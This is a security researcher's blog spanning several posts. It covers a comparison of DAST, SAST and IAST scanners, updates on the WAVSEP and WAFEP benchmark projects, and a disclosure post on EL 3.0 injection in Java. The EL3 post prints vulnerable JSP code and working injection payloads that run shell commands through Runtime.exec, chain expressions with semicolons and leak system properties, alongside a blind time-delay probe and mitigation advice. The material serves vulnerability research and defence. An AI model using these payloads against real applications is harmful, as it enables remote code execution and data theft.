Monday, May 1, 2017

DAST vs. SAST vs. IAST - Modern SSDLC Guide - Part I


Disclaimer
This article uses a relative ratio for the various charts, rather than an accurate one, to emphasize the ups and downs of various technologies to the reader. It also reflects the current situation to date (which may change as technologies mature), and relies on generalizations and estimations of the capabilities of technologies, and so must be read in the proper context.

With the upcoming publication of the WAVSEP 2017 benchmark close at hand, I wanted to take the opportunity to provide my take on the role of DAST tools in the context of the various technologies and trends that have recently become dominant and prominent in the field.

Where do they fit in? What do they excel in compared to alternatives? When is the right time to use them?

Using a variety of vulnerability detection solutions has become widespread in software development projects, with the key goal of detecting crucial vulnerabilities as early as possible.

With the introduction and maturation of new vulnerability-detection technologies (IAST/DAST/SAST/HYBRID/OSS), and the expected stream of (understandably) conflicting vendor claims, users may find it hard to discern which technologies fit their needs, how to PRIORITISE their acquisition/integration, and when is the right time to engage each solution category.

In the following article, I will be covering a few of the key aspects of integrating these toolsets into an SSDLC (secure software development life cycle) environment – the OVERALL EFFORT and the IDEAL TIMING of each solution category, and the benefit of SUPPORTED TECHNOLOGIES and CODE COVERAGE they provide under different circumstances.

In addition to exposing the reader to a wide variety of tools-of-the-trade, the article can also help answer some basic questions when evaluating any one of these tools.

For those of us who somehow managed to escape the terms currently in use – this article covers the following technologies:

1) DAST – Dynamic Application Security Testing – Generic and Known Web Application Vulnerability Scanners that analyze a live application instance for security vulnerabilities. To further clarify – this is the category of tools that was covered in all the previous WAVSEP benchmarks.

  • This article specifically focuses on DAST solutions which are actively maintained and/or SSDLC-adapted, with the ability to verify potential vulnerabilities through some sort of Exploitation/Verification process (referred to as EV for the purposes of this article), either external or built into the detection algorithm, as opposed to "fuzzer"-like tools based primarily on algorithms that rely on identifying specific keywords in the response (a minimal illustration of the difference follows the list of definitions below).

2) SAST – Static Application Security Testing – Generic & Known Application Vulnerability Code-Level Scanners that analyze source code and application configuration files for security vulnerabilities.

3) IAST – Interactive Application Security Testing – Generic and Known Application Vulnerability Debug/Memory Level Analysis Solutions that attempt to identify vulnerabilities on live application instances while also analyzing code structures in the memory and tracking the input flow throughout the application sections. This category is further divided into the following subcategories:
  • Passive IAST – IAST solutions that rely on traffic already being generated to identify potentially vulnerable sections, WITHOUT performing additional attack/exploit verifications (e.g. sending input with all the necessary exploitation characters, etc).
  • Active IAST – IAST solutions that verify potential vulnerability sinks/sources through the use of requests that verify the actual exploitability of the potential vulnerability (again, by issuing requests that contain input with all the necessary exploitation characters, or through similar means).


4) OSS - Open Source Security – the SAST equivalent of the mythological CGI-scanner – for the purposes of this article, these solutions were integrated into the category of SAST, due to the similarity of their chart positioning and role, although they operate in an entirely different manner, and focus only on the identification of “known” vulnerabilities in 3rd party libraries.


*) The various aspects of hybrid analysis tools are NOT covered in the various article sections and charts, and the same goes for network vulnerability scanners with application-level features but without SSDLC adaptation, or cloud security solutions without SSDLC integrations.
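To illustrate the EV distinction mentioned in the DAST definition above, here is a minimal sketch - the target URL, parameter and time-delay payload are hypothetical examples, and this is not the logic of any specific scanner. A keyword-based fuzzer would flag a parameter simply because an error string appears in the response, while an EV-style check actively confirms exploitability, for example by measuring the effect of a time-delay payload:

import java.net.HttpURLConnection;
import java.net.URL;

// Minimal sketch of an Exploitation/Verification (EV) style check vs. keyword matching.
// The target URL, parameter and payload are hypothetical examples.
public class EvCheckSketch {

    static long timeRequest(String url) throws Exception {
        long start = System.currentTimeMillis();
        HttpURLConnection con = (HttpURLConnection) new URL(url).openConnection();
        con.getResponseCode(); // wait for the full response before measuring
        return System.currentTimeMillis() - start;
    }

    public static void main(String[] args) throws Exception {
        String base = "http://target.example/item.jsp?id=1";
        long baseline = timeRequest(base);
        // EV approach: inject a time-delay payload and verify the delay is actually observed
        long delayed = timeRequest(base + "'%3BWAITFOR%20DELAY%20'0:0:5'--");
        if (delayed - baseline > 4000) {
            System.out.println("Verified: the injected delay affected the response time");
        }
        // a keyword-based fuzzer, in contrast, would only grep the response body
        // for strings such as "SQL syntax error" - an approach prone to false positives
    }
}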

So Which Solution Category Is Most Important in SSDLC?


Technology Support vs. Code/Application Coverage

The most obvious differentiation between the various scanning solution categories is the number of supported technologies.
IAST solutions typically support only a handful of development technologies, SAST solutions can support a myriad of modern and legacy programming languages, and DAST solutions are rarely affected by the development technology -



Supported Technologies
  • DAST – Any application with a WEB/REST/WebService back-end. Some exotic back-end listeners may be supported as well (web-sockets, DWR, AMF, etc). The support also depends on compatibility with input delivery vectors, as well as compatible crawling OR session recording features.
  • SAST – Java, ASP.Net, C#.Net, VB.Net, PHP, Node.js, Html/JS, SQL, Ruby, Python, C, C++, JSP, ASP3, VB6, VBScript, Groovy, Scala, Perl, Apex, VisualForce, Android/iOS/WinMobile, Objective C, Swift, PhoneGap, Flex ActionScript, COBOL, ABAP, Coldfusion CFML
  • IAST – Java, .Net, PHP (few vendors), Node.js (few vendors), Ruby (few vendors), Python (experimental)

The charts and tables reflect the results of high-end DAST/SAST/IAST solutions in the industry, and obviously, some SAST and IAST solutions may support a much smaller subset of technologies than the listed scope. Comparing the support for scanning non-web application variants (custom non-HTTP-based protocols) would drastically affect the chart as well.

It is also important to mention that DAST/Active IAST solutions in automated modes also need to be able to "crawl" the technology, or at the very least support the creation of recorded "sessions" of a manual crawling process, and also support sending attack payloads through the "input delivery vectors" used by the application (e.g. query-string / body / JSON/ XML / AMF / etc).

Although SAST / Passive IAST solutions also need to support "tracking" the input delivery vectors, they could, theoretically, identify hazardous code patterns without tracking the entire input-output flow, at the price of potential false positives being reported.
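As a simplified illustration (hypothetical code, not tied to any specific SAST engine), a purely pattern-based rule that flags every call to a dangerous sink would report both of the following methods, even though only the first one is actually reachable by attacker-controlled input:

// A signature-based rule such as "flag any Runtime.exec() call" matches both methods below,
// but only the first is exploitable - the second is a likely false positive
// (assumes the servlet API is on the classpath).
public class SinkPatternExample {

    // tainted flow: a request parameter reaches the command-execution sink
    public void runUserTool(javax.servlet.http.HttpServletRequest req) throws java.io.IOException {
        String tool = req.getParameter("tool");
        Runtime.getRuntime().exec("/usr/bin/" + tool);
    }

    // constant flow: no external input is involved, yet the same pattern still matches
    public void runHousekeeping() throws java.io.IOException {
        Runtime.getRuntime().exec("/usr/bin/logrotate");
    }
}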

The difference in technology support in IAST solutions is partially related to the fact that IAST implementations are relatively new compared to DAST or SAST implementations, but also to the amount of effort required to "integrate" the IAST engine with each new technology, and furthermore, to maintain the implementation as newer versions of the same supported technologies are released (adaptations may be required for major Java JVM versions, newer .NET framework versions, etc).

So, although this technology-support "GAP" may shrink over time, the effort required to maintain technology support will grow at a faster pace, at least compared to the pace of DAST and SAST technology compliance.

It is, however, worth mentioning that most IAST vendors focus on widely used technologies that cover as much ground as possible (Java / .Net / PHP / Node.js), and thus the actual importance of this "gap" will vary greatly between organizations, and may even be insignificant for some.

And what of coverage?

As it turns out, being able to "support" a technology does not necessarily mean the testing tool automatically covers the larger portion of its scope, which in turn may dramatically affect the results.

The type of technologies evaluated, the method of evaluation, the code deployment format, and even the "legal" ownership of the source code libraries may affect the actual sections being covered by the tool.

The coverage criteria will be easier to understand in the form of a table, rather than a chart:

Coverage (✓ = supported, ? = partial, ✗ = unsupported):

  • Out-Of-The-Box (Wide Coverage, Min Effort): DAST – ? (In Unauthenticated/Form/Basic/NTLM); SAST – ✓ (Most Scenarios); Passive-IAST – ? (In Tested/Used Instances); Active-IAST – ✗ (Depending on Implementation)
  • End-To-End Coverage (Scan/Correlate Issues in All Client/FE/BE Layers): DAST – ✓ (In Client Triggered Sequences); SAST – ✗ (Depending on Implementation); Passive-IAST – ✗ (Depending on Implementation); Active-IAST – ? (Depending on Implementation)
  • 3rd Party Code (Closed Source Libraries/Entry-Points): DAST – ? (For “Visible” Methods); SAST – ✗ (No De-compilation); Passive-IAST – ✓ (Depending on Implementation); Active-IAST – ✓ (Depending on Implementation)
  • Dead/Blocked Code (Non-Web Executable): DAST – ✗ (Depending on Implementation); SAST – ✓ (Most Scenarios); Passive-IAST – ✗ (Depending on Implementation); Active-IAST – ✗ (Depending on Implementation)

Conclusion:
DAST and SAST tools *typically* support more technologies, and as far as coverage is concerned -
  • DAST excels in end-to-end coverage AND "visible" 3rd-party coverage, but may require manual configuration for each application, or at the very least, an effective crawling mechanism that supports the front-end GUI technology.
  • SAST excels in out-of-the-box coverage, but lacks in 3rd party software coverage (assuming it does not perform de-compilation of 3rd-party libraries), and may require manual syncing to "identify" associated end-to-end layers. That being said, early in development, it's probably the most likely method of getting early feedback on potential vulnerabilities.
  • IAST will typically be positioned somewhere between the two in the various coverage categories - it will require agent distribution to support end-to-end detection (if it is supported at all), but will require less effort to achieve a wide coverage of application entry points (particularly in the case of Passive-IAST), and might have the advantage of potentially providing an in-depth coverage for CLOSED 3rd-party code/libraries.

Integration Effort vs. False Positives Effort

Throughout the development process, in both the early and later stages, the amount of effort invested in detecting these vulnerabilities can, knowingly or not, play a key role in the success of the detection process.

For every vulnerability detection solution and for every scenario, resources are required to integrate the chosen solutions, maintain the integration (not as easy as it sounds), and go over the results to filter high-impact and relevant issues.

Since at all phases there's a limited amount of human and IT resources, overly complex integrations can DELAY (or sometimes even PREVENT) the detection of security issues to a point where the benefit of detecting them early no longer applies, while complex and tedious result analysis processes can easily cause developers to ignore identified critical issues due to the sheer number of irrelevant results.

The overall effort of using each tool is not always properly estimated by potential consumers, and for the various tool categories, is focused on different areas.

Although the most obvious effort seems to be the initial integration of the vulnerability scanning process (for live instances, code, or a combination thereof), the process of verifying which of the results are REAL and EXPLOITABLE, to justify the mitigation effort, may be just as tedious and even more time consuming.

To put the upcoming results into proper perspective, it's crucial to understand that the relative ratio presented in the various charts is exactly that - relative, and that in fact, most modern solutions are FAR BETTER in terms of accuracy than previous generations of tools (early DAST / early SAST / fuzzers / parsers). To further emphasize the perspective, assume the accuracy of modern tools falls in the following context when compared to that of previous-generation tools:



And now, with the relative scale clarified, we can begin to compare modern technologies against each other.

To simplify the analysis, we will evaluate effort required to integrate, maintain, and analyze the results (False Positives vs. True Positives) of various vulnerability detection tool categories, in relation to each other:



From the point of view of integration, some tools are easier to integrate than others, some require very little or no maintenance effort, and some require a specific scan policy in order to maximize result efficiency.

The justification for the chart diversity of the various categories is as follows:
  • In an environment without any live application instances, SAST solutions can still be used to scan source code repositories, either directly or through the upload of source code projects, simplifying the initial assessment process.
  • In an environment with live application instances, IAST solutions can be integrated simply by deploying an agent to the assessed application's baseline framework (see the example after this list). Although the initial integration may be difficult (dedicated servers, configuration, potential performance issues in shared environments, etc), once the solution is set up there's very little maintenance.
  • In an environment with live application instances, DAST solutions can easily be used to scan unauthenticated applications and will require minor configuration to scan applications with FORMS/HTTP authentication. More complex authentication methods, scan barriers (e.g. anti-CSRF mechanisms) or architectures (micro-service architecture, REST, WS, etc) may require the creation of a dedicated policy and/or manual crawling session recording. Active IAST solutions will require most of those prerequisites, in addition to deploying agents to the various tested layers.
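For reference, deploying a typical Java-based IAST agent usually amounts to adding a JVM argument at application startup - the agent path and property name below are hypothetical, vendor-specific values:

java -javaagent:/opt/iast/agent.jar -Diast.console=https://iast-console.example -jar application.jar

Once the agent is attached, the instances exercised by functional tests or normal traffic are analyzed without further per-application configuration.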


To complete the picture, we will now address the false positive effort aspect - presenting the *typical* ratio of false positives in the results provided by the various tool categories, and the corresponding effort required to identify actual issues among the analysis results:




The relative ratio of false positives derives from the efficiency and number of methods that can be used by each technology to verify that identified vulnerabilities are not false positives:




The justification for the chart diversity of the various categories stems from the verification methods that can be used by each solution category:



Verification methods (✓ = used, ? = partial, ✗ = not used):

  • Execution URL (Client-Driven Exploitation, Entry-Point-To-Vuln-Code): DAST – ✓ (Exploit URL / Payload); SAST – ✗/✓ (Framework Dependent); Passive IAST – ✓ (Exploit URL); Active IAST – ✓ (Exploit URL and Payload)
  • Execution CLI (Command Line Exploitation, CLI-Param-To-Vuln-Code): DAST – ✗ (CLI Not Supported); SAST – ✓ (CLI Entry Point Detected); Passive IAST – ? (Theoretically Possible); Active IAST – ? (Only via Passive)
  • Flow/Taint Analysis (Track Sequence of Methods to Activate Vulnerable Code): DAST – ? (Irrelevant for Technology); SAST – ✗/✓ (Key-Word Dependent); Passive IAST – ✓ (In Effect); Active IAST – ✓ (In Effect)
  • Input Effect on Sink (Track Live Input Effect on the Vulnerable Code): DAST – ? (Through Binary Methods); SAST – ✗ (Not Performed); Passive IAST – ✓ (Commonly Used); Active IAST – ✓ (Commonly Used)
  • Modified Input Effect (Track Modified Input Effect on the Vulnerable Code): DAST – ✓ (Payload Effect Analysis); SAST – ✗ (Not Performed); Passive IAST – ✗ (Not Performed); Active IAST – ✓ (Payload Effect Analysis)
  • Execution POC (Time Delay, External Access, Browser Effect, Response Diff): DAST – ✓ (Commonly Used); SAST – ✗ (Not Performed); Passive IAST – ✗ (Not Performed); Active IAST – ✓ (Commonly Used)
  • Exploitation POC (Full Scale Exploitation: Data Extraction, RCE, Shell Upload): DAST – ✓ (In Some Solutions); SAST – ✗ (Not Performed); Passive IAST – ✗ (Not Performed); Active IAST – ✓ (In Some Solutions)
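To make the "Input Effect on Sink" verification above more concrete, here is a minimal, purely illustrative sketch (hypothetical class and method names, not any vendor's actual implementation) of how a passive IAST agent might track a live request value from a source to a SQL sink via instrumentation callbacks:

import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;

// Purely illustrative sketch - real agents instrument bytecode and track taint per request;
// the class and method names here are hypothetical.
public class PassiveIastSketch {

    private static final Set<String> taintedValues = ConcurrentHashMap.newKeySet();

    // invoked (via instrumentation) whenever a request parameter is read - a "source"
    public static String onParameterRead(String value) {
        if (value != null) taintedValues.add(value);
        return value;
    }

    // invoked (via instrumentation) right before a SQL query executes - a "sink"
    public static void onSqlExecute(String sql) {
        for (String tainted : taintedValues) {
            if (!tainted.isEmpty() && sql.contains(tainted)) {
                System.err.println("[IAST] request input reached a SQL sink unmodified: " + tainted);
            }
        }
    }
}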


Additional importance is given to the information the various tools provide to a HUMAN trying to discern the relevance of the issues reported, and to the toolset (if any) provided to "reproduce" or manually "verify" the identified security issues.

Furthermore, the false positive factor becomes EVER MORE IMPORTANT as the volume of scanned applications increases. Weeding out false positives from actual issues will require time and effort from a security expert, and any misinterpretations will cost even more for developers to mitigate.


There’s always the exception
A relatively obsolete and unmaintained DAST vulnerability scanner, in which little or no effort is made to “verify” detected vulnerabilities, will fare no better, and probably much worse, than a typical SAST/Passive-IAST solution in terms of the ratio of false positive identification.
On the other hand, a relatively immature or unmaintained SAST/Passive-IAST solution will fare much worse than presented in the charts - even in the effort required for integration and maintenance, especially compared to a modern DAST implementation.


Part II Coming Soon...




Tuesday, September 15, 2015

WAVSEP Updates, FAQ and the 2015 Benchmark Roadmap


A couple of updates on the WAVSEP 2015 benchmark:

The 2015 benchmark is already ongoing, and I started testing scanners against a newer unpublished version of WAVSEP which will be published at the end of the benchmark.

I'll be focusing on the usual commercial and actively maintained open source contenders, but may include additional vulnerability scanner engines that match my criteria or join the comparison in one of the methods listed in SecToolMarket.

WAVSEP New Homepage

As of August 2015, WAVSEP has officially been migrated to GitHub, and the various installation instructions have been migrated to the relevant GitHub wavsep wiki (installation / features).

The source code, builds and wiki will be maintained on GitHub, but I'll be releasing builds to the wavsep SourceForge repository as well.

Just to clarify - both repositories currently contain the latest public version of WAVSEP.

About the Upcoming Benchmark

The benchmark will cover all the previously covered aspects, as well as 2-3 additional attack vectors, and 2-3 new measurement concepts. It's the biggest one so far, but hopefully, I'll find smarter methods of assessing the products to speed up the process.

As mentioned before, to make the results useful earlier, I'll be publishing some of the results during the testing to SecToolMarket, and tweet when there are updates to the various engines, instead of waiting until the end of the benchmark.

Vulnerability Scanner Feature Mapping to RvR

The plan is to eventually associate the various features assessed in WAVSEP with a new project called RvR (Relative Vulnerability Rating), currently hosted at the following address, aimed at defining identical classifications of features for comparing security products.

The RvR list currently includes 288 (!) attack vectors with videos, links, etc, but there are already 60+ additional attack vectors pending addition, contributed by volunteers from around the globe.

Trying to Release an Initial WAFEP Benchmark

WAFEP (Web Application Firewall Evaluation Project), WAVSEP's evil WAF-testing brother, is almost ready for its initial release, with thousands of proven WAF bypass payloads ready.
However, I'm trying to release an initial benchmark alongside the framework, covering 2-5 WAF engines, to make my point.

It's tricky to stuff these projects into the same timeframe, and WAVSEP is my current priority, but we'll see how it works out - WAFEP is designed to take a lot less testing time.

In any event, I'll tweet about additional updates and whenever I update the results.

Cheers



Sunday, January 18, 2015

RvR, WAFEP and WAVSEP results update


Most of my time these days is spent on creating a dynamic interface for updating benchmark results, and on two major projects aimed at enhancing the WAVSEP evaluations and adding comparison content beyond accuracy, crawling and automation.


The first project, RvR (Relative Vulnerability Rating), is a project I have already mentioned in the past, which merges vulnerabilities from well-known vulnerability classifications (WASC, CWE, CAPEC, OWASP, blogs, conferences, etc) into a list customized specifically for product feature evaluations.

The list, originally planned to include 233 attack vectors, already includes 284 (!!!) different attack vectors with unique classifications, links, repository mappings and videos.
A web site containing the content was published last week, and although all the content is very much usable, I'm still delaying the publication until I get some vendor feedback (expect an official publication soon).

The purpose of the project is not only to evaluate features of dynamic vulnerability scanners (DAST), but also to cover source code analysis tools (SAST), interactive application testing tools (IAST), and in contrast to the past - various software protection products, including application-level IDS/IPS mechanisms and web application firewalls (WAF).

Which leads me to the second project -

WAFEP - The Web Application Firewall Evaluation Project



WAFEP is an upcoming project aimed at serving a WAVSEP-like role for various application-level protection products.

Unlike WAVSEP, WAFEP is planned to be completely automated in terms of payload execution AND result calculation, and would enable the evaluation of web application firewalls in relatively short timeframes.

The "accuracy" aspect is implemented as attack vector specific payloads meant to simulate context-specific exploits that an IDS/IPS/WAF should identify and/or prevent, false positive scenarios that should not be identified, and in the future, evasion techniques that may circumvent the detection process.

The project already includes thousands of payloads imitating flavors of roughly 10 high-impact attack vectors, some of which were already published in an early alpha version uploaded to the project's SourceForge repository last week.

The published alpha version is just a technology POC, and does not include most of the vector payloads or content, but in the upcoming weeks I'll make an effort to finish up some sections in the platform and release a v1.0 public version.
I'll also publish updated versions with relevant payloads in the meantime, at least until I reach the 1.0 goal.

http://sourceforge.net/projects/wafep/


WAVSEP Results Update

Finally, from time to time, I still try to squeeze in additional WAVSEP product assessments for additional vendors, the latest of which is Tinfoil Security, alongside certain version upgrades.

As always, the full list is found in SecToolMarket, and the following image summarizes the updates:



If all goes well, in the near future, the list will be updated with the results of a couple more.

I didn't update the results of any of the open source products, and will try to find the time to do so in the near future, at least for some of the projects - a task that should be much easier once the dynamic interface is finally online.

Wednesday, December 17, 2014

EL 3.0/Lambda Injection: Hacker Friendly Java

The following article explains the mechanics of a code injection attack called EL3 Injection, in applications that make use of the relatively new EL 3.0 processor in Java.

New mechanics and operators introduced in EL3 make the discovery and exploitation of this exposure almost as easy and seamless as SQL Injection, and the impact of the vulnerability is severe, with potential impacts such as denial of service, information theft and even remote code execution.

Since the EL3 technology is relatively new, it's probably not (YET) as common as other severe exposures, but at the very least, it will put a big wide THEY DID WHAAAAT!? smile on your face.

[Note – 
The following article discusses a generic application-level coding flaw in modern Java applications, NOT a java 0-day.

Keep on reading – the juicier RCE payloads are presented at the end]

While trying (and miserably failing) to create a training kit for EL Injection (or Spring EL Injection, JSR245, if you will), published by Stefano Di Paola and Arshan Dabirsiaghi, I spent some time trying to get a working build of the Eclipse-based STS IDE version that supported the vulnerable Java Spring MVC versions (Spring 3.0.0-3.0.5).

Turns out that someone did a REALLY GOOD job eradicating every trace of the vulnerable builds, leaving only the time-consuming option of compiling the environment from scratch.

Luckily, at some point, I decided to take a short break, and read about the relatively new EL in Java (JSR341, not necessarily in Java Spring) – and found something VERY interesting.

Turns out that the newest Java expression language version, EL 3.0 (published sometime in 2013), includes multiple enhancements, such as new operators, security restrictions on class access, and so on.

A typical source code sample of using EL3 in a Servlet or JSP page would look something like:
<%@page import="javax.el.ELProcessor"%>
<%
ELProcessor elp = new ELProcessor();
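// note: for this sample to evaluate, a bean named "user" is assumed to have been
// registered beforehand, e.g. via elp.defineBean("user", someUserObject)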
Object msg = elp.eval("'Welcome' + user.name");
out.println(msg.toString());
%>

The ELProcessor dynamically evaluates the EL statement, and attempts to access the "name" field of the Bean (or registered class) user.

After taking a couple of shots at "guessing" objects that might be accessible by default, I stumbled on one of the features that can be used to define access to classes in EL3, which includes the ELManager class methods importClass, importPackage and importStatic.

These methods could be used to "import" various classes and even packages into the scope of the expression language, so they could be referenced within expressions.

So in order to use classes in EL3 expressions, you'll need to include them using statements such as –
elp.getELManager().importClass("java.io.File");

This feature was implemented due to safety concerns (or in other words, security), to make sure that access is prevented to any class that was not also included in the page/project's original EL imports AND application imports, so that even if developers enable user input to affect the "importPackage" or "importClass" statements, the external effect will be limited to the classes already imported in the context.

However, since many interesting classes and packages are typically used in Servlets and JSP pages, an attacker can still abuse this feature in multiple scenarios –

(1) If the developer already imported a class that the attacker needs into the EL context, and an attacker controlled input is used within the expression evaluation:
Input1 = "File.listRoots()[0].getAbsolutePath()"
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
elp.getELManager().importClass("java.io.File");
Object path = elp.eval(input1);
out.println(path);
%>

(2) If the developer enabled the user to control the importClass/Package statement (no limits to human stupidity, right?), and already has a wide enough scope imported in the page/application imports:
Input1 = "File.listRoots()[0].listFiles()[1].getAbsolutePath()"
Input2 = "java.io.File";
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
<%
String input1 = request.getParameter("input1");
String input2 = request.getParameter("input2");
ELProcessor elp = new ELProcessor();
elp.getELManager().importClass(input2);
Object path = elp.eval(input1);
out.println(path);
%>







So, here you go.
A nice exploit that will probably affect a couple of desolate apps, with super insecure code. Hardly worth its own classification.
However, while trying to squeeze some more juice out of the potential attack vector, I stumbled upon the following video, which explains the features of EL3 in great detail.

To make a long story short, watch the video and skip to 7:52.
It's well worth your time.

Turns out that despite the security restrictions that required developers to explicitly import classes and packages to be used in the EL3 scripts, the java.lang package was included by default, to enable the typical developer to gain access to static fields and methods such as Boolean.TRUE and Integer.numberOfTrailingZeros.

They enabled access by default to the static members of classes in JAVA.LANG, as in the java.lang package that includes java.lang.System and java.lang.Runtime!

JAVA.LANG!

Seems like somebody there confused "user friendly" with "hacker friendly" :)

So, if for some reason, a user-controlled input would stumble into an EL3 eval clause, which for some reason Java is encouraging users to use in many platforms such as JSF, CDI, Avatar and many CMSs, then attackers could do a LOT more with no requirements on specific imports -
Input1 = "System.getProperties()"
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval(input1);
out.println(sys);
%>



Also, instead of using the System class, we can use the Runtime static class methods to execute shell commands. For example:
Input1 = "Runtime.getRuntime().exec('mkdir abcde').waitFor()"
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval(input1);
out.println(sys);
%>


An impact similar to that of Spring's counterpart of EL injection, only in mainstream Java.
Cool. Now we can shamelessly classify the attack and rest.

But there's more!

Although scenarios in which the user's input gets full control of the entire EL string are possible, they are much less common than scenarios in which user input is integrated as part of an EL string, in which case most of the previously mentioned payloads won't work.

However, EL 3.0 was kind enough to present us with NEW operators, one of which is the infamous semicolon (;).

As its SQL counterpart's functionality suggests, the semicolon delimiter can be used in EL 3 to close one expression and add additional expressions, with or without logical relations to each other.

Think adding multiple lines of code to a single attack payload. Think injecting payloads into the middle of an expression, while using techniques similar to blind SQL injection.

Don't think. Here's a couple of examples:
Input1 = "; Runtime.getRuntime().exec('mkdir aaaaa12').waitFor()"
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
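// with the payload above, the evaluated expression becomes:
// 'Welcome'; Runtime.getRuntime().exec('mkdir aaaaa12').waitFor()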
Object sys = elp.eval("'Welcome'" + input1);
out.println(sys);
%>
 


Input1 = "1); Runtime.getRuntime().exec('mkdir jjjbc12').waitFor("
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
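// with the payload above, the evaluated expression becomes:
// SomeClass.StaticMethod(1); Runtime.getRuntime().exec('mkdir jjjbc12').waitFor()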
Object sys = elp.eval("SomeClass.StaticMethod(" + input1 + ")");
out.println(sys);
%>

So due to the implementation of the semicolon operator, potential injections can now CLOSE PREVIOUS STATEMENTS and start new statements, making the potential injection almost as usable as SQL injection. Features such as EL variable declaration, value assignments and others (watch the video) just add more fuel to the fire.

So much for enhanced security features.

We already identified a few instances that affect real-world applications (no instances in core products, so far), and are currently handling them with the relevant entities.

I'll probably invest some more time in the upcoming weeks to see if any prominent java projects are prone to this issue, but in the meantime, some practical notes:

Regardless of how common these issues are, these potential exposures could easily be identified in code reviews or by source code analysis tools that track the effect of input on the various methods of the ELProcessor class, and on similar EL related classes. 
Generic blind injection payloads can be added as plugins for automated scanners, and we could go bug hunting to see if any more of these potential issues exist in the wild.
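For example, an illustrative, untested payload shape for a time-based blind check, relying on the default java.lang access described above, might look along the lines of:
Input1 = "; Thread.sleep(5000)"
A parameter that consistently delays the response by roughly 5 seconds with such a payload is a strong indication that it reaches an EL3 eval clause.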

The mitigation is also simple: don't embed input into EL statements, and validate the input in case you do.
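A minimal sketch of the safer pattern (using ELProcessor's defineBean method; the variable names and the use of the EL 3.0 += string-concatenation operator are illustrative assumptions) - the user-supplied value is handed to the expression as data, instead of being concatenated into the expression string:
<%@page import="javax.el.ELProcessor"%>
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
// register the raw value as a bean, so it is treated as data rather than as EL code
elp.defineBean("userInput", input1);
Object msg = elp.eval("'Welcome ' += userInput");
out.println(msg);
%>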

I'll update this post as the research progresses.

Cheers